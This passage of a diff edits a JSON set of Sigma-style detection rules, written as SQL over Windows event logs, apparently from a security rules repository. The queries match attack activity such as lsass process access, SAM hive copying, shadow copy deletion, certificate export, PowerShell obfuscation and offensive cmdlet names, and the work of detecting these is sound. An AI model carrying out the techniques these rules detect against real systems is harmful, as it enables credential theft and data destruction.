This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + 
"attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + 
"Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new 
EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": 
"afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + 
"title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND 
CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program 
Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if 
unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' 